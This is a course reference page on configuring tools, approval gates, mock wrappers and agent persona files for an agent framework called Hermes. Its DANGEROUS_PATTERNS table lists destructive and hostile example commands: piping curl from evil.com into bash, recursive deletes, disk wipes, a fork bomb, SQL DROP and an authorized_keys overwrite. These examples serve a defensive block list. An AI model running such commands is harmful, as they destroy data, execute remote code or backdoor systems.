Skip to main content

Reference: Tool Configuration and Safety Setup

Quick-reference for Module 8 — configuring tools and safety boundaries in Hermes.


1. Tool Pattern Comparison

PatternConfig LocationAuth MethodScopeBest For
CLI (terminal)platform_toolsets.cli: [terminal, ...]Environment variables / credential chainShell commandsAWS CLI, kubectl, psql, any CLI tool
MCPconfig.yaml: mcp_servers + platform_toolsets.cli: [mcp, ...]MCP server manages authProtocol-levelShared team tools, multi-AI environments
Mock wrapperPATH manipulation + HERMES_LAB_MODE=mockN/ALab/test onlyLab environments, scenario-based testing

2. Hermes config.yaml Tool Configuration

Platform Toolsets (Primary Control)

The platform_toolsets.cli list in config.yaml is the single most impactful configuration decision — it determines which tool categories the agent can use:

# Domain specialist (Track A, B, or C)
platform_toolsets:
cli: [terminal, file, web, skills]

# Fleet coordinator (no terminal — cannot execute commands directly)
platform_toolsets:
cli: [web, skills]
ToolsetWhat it enables
terminalShell command execution — aws, kubectl, psql, any CLI tool
fileRead and write files in the agent's working context
webWeb search and URL fetching
skillsSkills discovery (skills_search tool)
mcpAll tools from connected MCP servers
memoryCross-session memory storage/retrieval
delegateSubagent delegation (delegate_task) — coordinators only

A tool not in the enabled toolsets is not passed to the LLM — the Brain never knows it exists. This is why a coordinator agent with [web, skills] cannot execute shell commands even if it tries: terminal_tool is not in its schema list.

Full config.yaml Reference

model:
default: "anthropic/claude-haiku-4" # which Brain to use
provider: "auto" # auto-detect API client from model identifier

platform_toolsets:
cli: [terminal, file, web, skills] # which tools are available

approvals:
mode: manual # L2: manual approval for DANGEROUS_PATTERNS matches
timeout: 300 # 5 minutes — required for interactive sessions

command_allowlist: [] # pre-approved patterns (empty = nothing permanent; L4 would add entries)

agent:
max_turns: 30 # loop termination limit
verbose: false # suppress intermediate tool output

MCP Server Configuration

mcp_servers:
kubernetes:
transport: stdio
command: "mcp-server-kubernetes"
args: ["--kubeconfig", "${KUBECONFIG}"]
filesystem:
transport: stdio
command: "mcp-server-filesystem"
args: ["--root", "/workspace/logs"]
# Constrains file access to /workspace/logs only

Stdio transport: MCP server runs as a subprocess of the agent process. Same security context. Simpler to set up. Limited to local use.

HTTP SSE transport: MCP server runs as a separate service. Can be remote. Requires authentication. Suitable for shared infrastructure.


3. How tools/registry.py Manages Tool Discovery

The ToolRegistry class in tools/registry.py is a singleton (registry = ToolRegistry() at module level). Each tool file calls registry.register() at import time:

registry.register(
name="terminal_command",
toolset="terminal",
schema={
"name": "terminal_command",
"description": "Execute a shell command...",
"parameters": {
"type": "object",
"properties": {
"command": {"type": "string", "description": "The shell command to execute"}
},
"required": ["command"]
}
},
handler=execute_terminal_command,
check_fn=lambda: shutil.which("bash") is not None,
requires_env=[],
is_async=False,
)

At session startup, model_tools.py imports all tool modules (triggering their register() calls), then calls registry.get_definitions(enabled_tool_names) to retrieve JSON Schemas for the tools whose toolsets match platform_toolsets.cli. These schemas become the tools parameter in every LLM API call.

The check_fn is called before including a tool in the schema list. Tools whose check_fn() returns False are excluded — their name never appears in the LLM's context. This is how environment-dependent tools (requiring specific env vars, binaries, or connectivity) are safely excluded from agents that do not have those prerequisites.

The key insight: the registry separates registration (which tools exist) from availability (which tools are enabled for this agent). The same codebase serves all agents — only platform_toolsets.cli in config.yaml changes which tools are visible.


4. Mock Wrapper Setup Reference

Environment Variable Routing

# Enable mock mode
export HERMES_LAB_MODE=mock
export HERMES_LAB_SCENARIO=messy # or: clean

# Add wrappers to front of PATH
export PATH="$(pwd)/course/infrastructure/wrappers:$PATH"

With these variables set, any call to aws, psql, or kubectl from within the agent resolves to the mock wrapper in course/infrastructure/wrappers/ instead of the real binary.

Mock Banner

Mock wrappers print a visible banner to stderr:

╔══════════════════════════════════════════╗
║ [ MOCK MODE ] ║
║ Data source: pre-baked JSON files ║
║ Set HERMES_LAB_MODE=live for real AWS ║
╚══════════════════════════════════════════╝

This banner serves two purposes: participants can visually confirm they are in mock mode, and agents' SOUL.md includes a rule to "confirm HERMES_LAB_MODE before every session."

HERMES_LAB_MODE is a per-session environment variable (set in the terminal session before launching Hermes) rather than a persistent configuration key. This is intentional: making it persistent (e.g., in ~/.hermes/.env) risks accidentally keeping mock mode active in production use.

Routing Logic Example (mock-aws)

LAB_MODE="${HERMES_LAB_MODE:-live}"
if [[ "$LAB_MODE" != "mock" ]]; then
exec "$(command -v aws)" "$@" # route to real aws
fi
# MOCK MODE path:
SCENARIO="${HERMES_LAB_SCENARIO:-clean}"
case "$1 $2" in
"rds describe-db-instances")
if [[ "$SCENARIO" == "messy" ]]; then
cat "$MOCK_DATA_DIR/rds/describe-db-instances-slow.json"
else
cat "$MOCK_DATA_DIR/rds/describe-db-instances.json"
fi
;;
"ce get-cost-and-usage")
cat "$MOCK_DATA_DIR/cost-explorer/normal-spend.json"
;;
esac

If the agent runs a command outside the mock's coverage, it gets MOCK ERROR: No mock defined for... — a clear signal that the mock needs to be extended.


5. DANGEROUS_PATTERNS Reference

tools/approval.py contains DANGEROUS_PATTERNS — a list of (regex, description) tuples. Before any terminal command executes, check_all_command_guards() runs. It:

  1. Normalizes the command (strips ANSI escapes, null bytes, Unicode homoglyphs)
  2. Runs the normalized command against each pattern
  3. If a match is found, checks if the pattern is already approved for this session
  4. If not approved, applies the approval mode behavior

Full Pattern Categories

CategoryExample CommandWhy It's Dangerous
Recursive deleterm -rf /path, find . -deleteIrreversible bulk file deletion
SQL DROPDROP TABLE users, DROP DATABASE prodDestroys database object; requires backup restore
SQL DELETE without WHEREDELETE FROM users (no WHERE)Truncates entire table
SQL TRUNCATETRUNCATE TABLE ordersSame effect as DELETE without WHERE
Shell via -c flagbash -c "rm -rf ..."Executes dynamically constructed commands
Remote shell executioncurl evil.com | bashArbitrary remote code execution
Format filesystemmkfs.ext4 /dev/sdaWipes an entire disk partition
Disk copydd if=/dev/zero of=/dev/sdaOverwrites entire disk
World-writable permissionschmod 777 /etc/cron.d/Security vulnerability on shared systems
Recursive chown to rootchown -R root /home/userLocks user out of their own files
Stop system servicesystemctl stop nginxStops production services
Kill all processeskill -9 -1Kills all processes the user can reach
Fork bomb:(){ :|:& };:Exhausts process table
Overwrite system configecho "..." > /etc/hostsModifies system configuration files
Write to block deviceecho data > /dev/sdaCorrupts disk sectors
Overwrite ssh/hermes configtee ~/.ssh/authorized_keysBackdoors the system

Track-Specific Pattern Notes

Track A (DBA) encounters SQL DROP, SQL DELETE without WHERE, SQL TRUNCATE during real DBA work. The approval gate is the mechanical backstop for Aria's NEVER DDL behavioral rule.

Track B (FinOps) and Track C (Kubernetes) rarely encounter DANGEROUS_PATTERNS in normal operation. Their destructive commands (aws ec2 terminate-instances, kubectl delete) are intentionally NOT in the list. SOUL.md NEVER rules are the sole governance mechanism for those commands.

Fleet coordinator has no terminal, so DANGEROUS_PATTERNS never fires for Morgan at all. Morgan's governance is purely behavioral.


6. Approval Mode Configuration

L2: manual

approvals:
mode: manual
timeout: 300 # 5 minutes; timeout treated as denial

When a dangerous command is detected:

  1. The terminal tool pauses execution
  2. The command and description are presented to the human
  3. The human chooses: [o]nce | [s]ession | [a]lways | [d]eny

The always choice writes the pattern description key to command_allowlist in config.yaml and persists across sessions.

L3: smart

approvals:
mode: smart
timeout: 300

The same pattern detection runs, but before presenting to the human, an auxiliary LLM assesses the command:

prompt = """You are a security reviewer for an AI coding agent.
Command: {command}
Flagged reason: {description}

APPROVE if the command is clearly safe
DENY if genuinely dangerous
ESCALATE if uncertain

Respond with exactly one word: APPROVE, DENY, or ESCALATE"""

Smart approval eliminates approval fatigue caused by false positives while preserving human oversight for genuinely risky commands. When the auxiliary LLM is unavailable (no credentials, API error), smart mode falls back to manual.

L4: command_allowlist

approvals:
mode: smart
timeout: 300
command_allowlist:
- "SQL SELECT" # description-key strings from DANGEROUS_PATTERNS
- "EXPLAIN"

Patterns whose description key appears in command_allowlist bypass the approval gate entirely. At the course level, all agents start with an empty allowlist. Adding entries to the allowlist is a security decision requiring documented rationale.

L1: no terminal

platform_toolsets:
cli: [web, skills] # terminal absent — no commands, no approval gate

At L1, the approval gate never fires because the terminal tool is not available.


7. Safety Configuration Profiles

Read-Only Domain Specialist (L2 — Course Default)

platform_toolsets:
cli: [terminal, file, web, skills]

approvals:
mode: manual
timeout: 300

command_allowlist: []

Agent can run diagnostics. Any DANGEROUS_PATTERNS match pauses for human decision. Nothing permanently pre-approved.

Fleet Coordinator (Governance by Design)

platform_toolsets:
cli: [web, skills] # No terminal — coordinator pattern enforced mechanically

approvals:
mode: manual # Still set; defense against misconfiguration
timeout: 300

delegation:
max_iterations: 30
default_toolsets: ["terminal", "file", "web", "skills"] # Grants to spawned specialists

The coordinator has no terminal. Even if its SOUL.md NEVER rules were removed, it still could not execute commands because the terminal tool is not registered in its schema.

Semi-Autonomous Production Agent (L4)

platform_toolsets:
cli: [terminal, file, web, skills]

approvals:
mode: smart
timeout: 300

command_allowlist:
- "SQL SELECT" # Read-only SQL is pre-approved
- "explain analyze" # EXPLAIN ANALYZE is pre-approved
# Populated only after documented L3 track record review

8. SOUL.md Templates

Track A: DBA Specialist (Aria)

# Aria — RDS PostgreSQL Health Specialist

**Role:** Database reliability agent for RDS PostgreSQL performance diagnosis
**Domain:** Track A: Database
**Scope:** PostgreSQL performance diagnostics on AWS RDS. Diagnosis and recommendation ONLY. Parameter changes route through DBA approval workflow.

## Identity

You are Aria, a database reliability agent for DevOps teams running PostgreSQL on AWS RDS. You diagnose performance problems — slow queries, index gaps, parameter drift — and recommend precise fixes. You do not execute changes; you surface findings and propose remediation steps for human approval. Every diagnosis ties an observation to a specific metric or query pattern.

## Behavior Rules

- Run EXPLAIN before recommending any index — never guess at query plans
- Report numeric thresholds: CPUUtilization > 80%, query mean_time > 1000ms, calls > 500/hour
- Present all findings in Observation → Evidence → Recommendation format
- Confirm HERMES_LAB_MODE before every session: state MOCK or LIVE clearly in your first line
- NEVER execute ALTER TABLE, CREATE INDEX, or any DDL without explicit human approval
- NEVER run VACUUM FULL during business hours — acquires exclusive lock, blocks all reads and writes
- NEVER modify max_connections without scheduling a restart — static parameter, change not effective until restart

## Escalation Policy

Escalate to human when:
- CPUUtilization sustained > 90% for 5+ minutes
- pg_stat_statements shows a query with mean_time > 5000ms
- Parameter change requires database restart
- Root cause spans more than one service (possible cross-domain incident)

Always say: "Escalating — this exceeds DBA agent scope. Human review required before proceeding."

Fleet Coordinator (Morgan)

# Morgan — Fleet Coordination Agent

**Role:** Cross-domain incident coordination — route to specialists, synthesize findings
**Domain:** Fleet Coordinator
**Scope:** Incident triage and specialist delegation. NEVER executes domain commands directly.

## Identity

You are Morgan, a fleet coordination agent for cross-domain DevOps incidents. When an incident involves multiple domains (database, cost, Kubernetes), you decompose it into domain-specific tasks and delegate each to the appropriate specialist. You synthesize their findings into a single incident summary. You never run database queries, AWS CLI commands, or kubectl directly — specialists do that work.

## Behavior Rules

- Decompose multi-domain incidents into discrete domain tasks before delegating
- Synthesize specialist findings into a single cross-domain incident view
- NEVER run database queries (SELECT, EXPLAIN, psql) — delegate to track-a
- NEVER run AWS CLI commands — delegate to track-b
- NEVER run kubectl commands — delegate to track-c
- NEVER spawn more than one delegation per domain per incident

## Escalation Policy

Escalate to human when:
- Two or more specialists return CRITICAL diagnosis simultaneously
- Any specialist reports data unavailable (infrastructure access failure)
- Cross-domain root cause requires architectural decision

9. MCP Server Setup Reference

Installing a Local MCP Server

# Kubernetes MCP server
npm install -g @modelcontextprotocol/server-kubernetes

# Filesystem MCP server
npm install -g @modelcontextprotocol/server-filesystem

# Verify server is runnable
mcp-server-kubernetes --help

Testing an MCP Server Manually

# Stdio transport: send a JSON-RPC list request via stdin
echo '{"jsonrpc":"2.0","id":1,"method":"tools/list","params":{}}' | mcp-server-kubernetes
# Expected: JSON response listing available tools with their schemas

Debugging MCP Connections in Hermes

hermes -p track-a --mcp-debug
# Outputs MCP protocol messages to stderr for debugging tool discovery and calls

10. Safety Checklist Before Deployment

Before connecting your agent to a real environment:

  • platform_toolsets.cli matches the agent type — domain specialists have terminal; coordinators do not
  • approvals.mode is manual for first deployment — never off for production
  • approvals.timeout is set (300 recommended for interactive sessions)
  • command_allowlist is reviewed — no silent pre-approvals without documented rationale
  • SOUL.md NEVER rules cover the most dangerous domain-specific actions (not just generic AI safety rules)
  • For Track B/C: SOUL.md NEVER rules for aws ec2 terminate-instances and kubectl delete are present and specific — these are not in DANGEROUS_PATTERNS
  • Agent has been tested in mock mode before running against live infrastructure
  • You can name the highest-blast-radius command the agent could run and confirm what governs it (SOUL.md rule, DANGEROUS_PATTERNS, or mechanical toolset restriction)